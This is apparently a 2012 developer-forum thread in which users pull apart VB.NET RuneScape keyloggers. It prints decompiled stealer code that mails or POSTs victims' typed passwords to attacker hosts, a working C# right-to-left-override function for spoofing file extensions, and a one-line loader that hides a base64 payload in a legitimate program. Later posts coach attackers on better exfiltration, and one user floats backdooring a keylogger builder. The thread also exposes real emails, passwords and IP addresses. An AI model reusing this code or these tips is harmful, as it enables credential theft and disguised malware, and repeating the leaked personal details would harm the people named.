Trying to decrypt VB .Net keyloggers - Developers

[QUOTE=supersnail11;34945802]Have you ever tried decompiling a C++ application? Visual Basic/C# are not raw executables, they are stored in a way that allows them to be decompiled to comprehensible code. Even if you could do the same to C++, the code that comes out of it would be so incomprehensible that it would be useless. The compiler doesn't compile the C++, it converts it to Assembly and compiles that. Which means it is MUCH, MUCH harder to decompile a C++ application.[/QUOTE] Provided that you know what you are doing and have a decent grasp of Assembly it isn't hard, especially if the virus is made by someone that assumes no one is going to bother reversing it just because it was made in C++. And Darwin is right, any decent debugger or disassembler will have the ability to check the string references.

Ok, Lets pretend that we had a sample that was like some of the VB.Net ones. DES Encryption on the password. So on .Net we can just scan out and match the byte code in the program. However if it was made in C++ and we looked into it we would be left with a bunch of [URL="http://en.wikipedia.org/wiki/X86_instruction_listings"]op codes[/URL]. Now you have to follow the program though the decryption sequence to get the real password. You could scan for stings but you would only get the encrypted string. If the attacker is smart (What has been done in some of the programs I have found) they make the keys up using a low tech function, So in a C++ seniro you cant just look for the key. You would have to step though the code to get the key, You might as well step though enough to get the end result (the password.) I also though of a 2nd way of doing it that that would be to intersect the SSL traffic using a fake cert, easier too. Please correct me if i'm wrong in any of my points. [editline]1st March 2012[/editline] [IMG]http://www.benjojo.co.uk/fp/Screenshot-2012-03-01_19.51.16.png[/IMG] :v:

You could be smart and use a .net packer that's made in c++

How do you guys deal with obfuscation? I can't work this code out as all the functions and stuff are named c2ddc7fe33bcaf89d2a87344192d0ab10() etc

[QUOTE=AMD 32;34947227]How do you guys deal with obfuscation? I can't work this code out as all the functions and stuff are named c2ddc7fe33bcaf89d2a87344192d0ab10() etc[/QUOTE] Find And replace?

[QUOTE=AMD 32;34947227]How do you guys deal with obfuscation? I can't work this code out as all the functions and stuff are named c2ddc7fe33bcaf89d2a87344192d0ab10() etc[/QUOTE] It depends on what kind of obfuscation it is. If it's just renaming, simple assembly explorer's default deobfuscator. If it's more complex I use de4dotnet.

[QUOTE=marvincmarvin;34947283]It depends on what kind of obfuscation it is. If it's just renaming, simple assembly explorer's default deobfuscator. If it's more complex I use de4dotnet.[/QUOTE] Or do it the real mans way and just work around it.

[QUOTE=supersnail11;34947375]Or do it the real mans way and just work around it.[/QUOTE] Or the real real man's way; notepad.

[QUOTE=AMD 32;34947227]How do you guys deal with obfuscation? I can't work this code out as all the functions and stuff are named c2ddc7fe33bcaf89d2a87344192d0ab10() etc[/QUOTE] Use [url=https://github.com/0xd4d/de4dot]de4dot[/url]. ([url=https://github.com/downloads/0xd4d/de4dot/de4dot-1.6.1.zip]Binaries[/url])

client.set_Credentials(new NetworkCredential("Zamcrack3r@hotmail.com", "bandos")); Well that was easy..

Completely forgot gmail logs ips. Need to start recording these peoples ips. For shits and giggles next US/Can virus I come across I am going to try contacting their ISP to see were it goes. [url]http://www.youtube.com/watch?v=MnjLRMXGbcE[/url] [email]obotovo@gmail.com[/email]:-snip- [email]psp.private.bremen@hotmail.de[/email] Germany (91.58.234.109) 10:49 (6 hours ago), March 1, 2012

I found a very Interesting key-logger. First, a EXE inside of a EXE that's inside of a EXE. Then i found this. [CODE]http://1648795134.1x.biz/secure.runescape.com/m=weblogin/g=runescape/secure.runescape.com/m=weblogin/www.jagex.com/ajax.googleapis.com/m=weblogin/post3.php?username1=" + this.TextBox1.Text + "&password1=" + this.TextBox2.Text[/CODE] I ran the biz through ping, [IMG]http://puu.sh/j3CE[/IMG] And Google'd the ip, [IMG]http://puu.sh/j3Di[/IMG] And the ip leads here, [IMG]http://puu.sh/j3Hv[/IMG] Ain't that interesting.

I just came across someone who used the sneaky windows file extension bug by using some arabic character in the file name. Said file was called *.exe.doc, but upon downloading it actually changed to *.-cod.exe. Some people are crafty.

[QUOTE=Phreebird;34949446] ... [/QUOTE] Sounds like they used a crypter on a file twice. [QUOTE=Shad0wZ;34949550] ... [/QUOTE] That's actually a very popular public method on some malware programming forums.

You dont see it used often by youtube spreaders though.

The operation seems a little advanced for Runescape key-logging.

It's not advanced at all. [csharp] public static string SpoofFileExtension(string fileName, string extension) { char[] extensionCharArray = extension.ToCharArray(); //Insert the extension into an array Array.Reverse(ref extensionCharArray); //Reverse the array string newFileName = fileName.SubString(0, fileName.Length-4); //Get the filename w/out the extension newFileName += ((char)8238) + new string(extensionCharArray) + fileName.Substring(fileName.Length - 4); //Add the reverse char (I don't know the correct name), then the new extension, and finally the original extension File.Move(fileName, newFileName); //Super advanced renaming technique } [/csharp]

It amazes me how much personal information people will put on an account they put in a keylogger. [url]http://www.youtube.com/watch?v=fPJfS62nJPY[/url] [email]mattyberry9@gmail.com[/email]:runescape12345 (changed) [email]matty_berry9@hotmail.co.uk[/email] <name> <phone> United Kingdom (81.97.17.17) 18:23 (1 minute ago), March 1, 2012

[code]private void Button1_Click(object sender, EventArgs e) { if (this.TextBox1.get_Text() == "") { Interaction.MsgBox("Username Is Missing", 0, null); if (this.TextBox2.get_Text() == "") { Interaction.MsgBox("Password Is Mising", 0, null); } } SmtpClient client = new SmtpClient(); MailMessage message = new MailMessage(); client.set_Credentials(new NetworkCredential("jonaspowarr@gmail.com", "jonasjonas")); client.set_Port(0x24b); client.set_Host("smtp.gmail.com"); client.set_EnableSsl(true); message = new MailMessage(); message.set_From(new MailAddress("jonaspowarr@gmail.com")); message.get_To().Add("jonaspowarr@gmail.com"); message.set_Subject("Runescape Login door Membership Hack V7: "); message.set_Body("Gebruikersnaam : " + this.TextBox1.get_Text() + " en het wachtwoord is : " + this.TextBox2.get_Text() + " en die wou het membership : " + this.ComboBox1.get_Text() + ", maar helaas. xD "); client.Send(message); Interaction.MsgBox("Membership Succesfully, delivery within 2 days", 0, null); } [/code] Nobody even tries to make it difficult in the ones I find (aside from the obfuscated one earlier) [editline]2nd March 2012[/editline] Also lol at people using their personal accounts instead of registering another e-mail for it [editline]2nd March 2012[/editline] [img]http://gyazo.com/4a9e313e4c56dc397b071ca81b819957.png?1330646558[/img] Is this.. brail?

I feel like I'm shooting myself in my foot when I write this, but oh well. [url]http://blogcake.x10.mx/wordpress/2012/03/keyloggers-wrong/[/url]

I don't see why people don't use legitimate applications and add this to the entrypoint.. [csharp] Assembly.Load(Convert.FromBase64String("[B64EncodedApplication]")).EntryPoint.Invoke(null, new object[] {}); [/csharp] [QUOTE=AMD 32;34950559][img]http://gyazo.com/4a9e313e4c56dc397b071ca81b819957.png?1330646558[/img] [/QUOTE] What classes are in the "-" namespace? (other than <Module>)

OK guys quick ethical question. What if you were to: Take the official project neptune Add a line that sends every gmail username and password to an email when the keylogger is created Release on youtube Ethically fine Y/N

[QUOTE=supersnail11;34952584]OK guys quick ethical question. What if you were to: Take the official project neptune Add a line that sends every gmail username and password to an email when the keylogger is created Release on youtube Ethically fine Y/N[/QUOTE] If the skids that use this shit can't put in the effort to even check that what they intend to use isn't malicious against themselves, they deserve to be punished.

The way I look at it, we'll be getting it from their keyloggers in the future anyways.

[QUOTE=Shad0wZ;34949550]I just came across someone who used the sneaky windows file extension bug by using some arabic character in the file name. Said file was called *.exe.doc, but upon downloading it actually changed to *.-cod.exe. Some people are crafty.[/QUOTE] That's awesome. I never thought of that before. Exe is a palindrome so encoding it right-to-left happens to work.

Can we have some word from the mods about how far we are allowed to go with posting details and or calling them.

[QUOTE=supersnail11]To make this much harder to do, if they wrote them in C++ or a language that doesn’t compile to bytecode but instead compiles directly to PE (.exe format)[/QUOTE] The word you're looking for here is machine code, Visual Studio still produces PE files for .NET code. [QUOTE=supersnail11]Basically, instead of using email to send your logs, you send them with a POST or GET request to a webpage on your server.[/QUOTE] What about anonymity? What about hosting? You get that for free with email.

[QUOTE=dajoh;34956057]What about anonymity? What about hosting? You get that for free with email.[/QUOTE] You can get anonymous hosting. Just it will cost you quite a bit. Really people are just doing the email way wrong. A simple way to do it more securely is you register 2 accounts. 1 for sending emails and 1 for receiving. That way even if you lose the sending one you still have control of the receiver. Also you could probably use a free service to dynamically update the sender when its changed.

Basically use a forwarding email, not your personal gmail idiots

[QUOTE=high;34956121]That way even if you lose the sending one you still have control of the receiver.[/QUOTE] Losing the sender account isn't acceptable. [QUOTE=high;34956121]Also you could probably use a free service to dynamically update the sender when its changed.[/QUOTE] Which will get lost too eventually. What these morons who make these keyloggers don't understand is that you can send emails without having any credentials.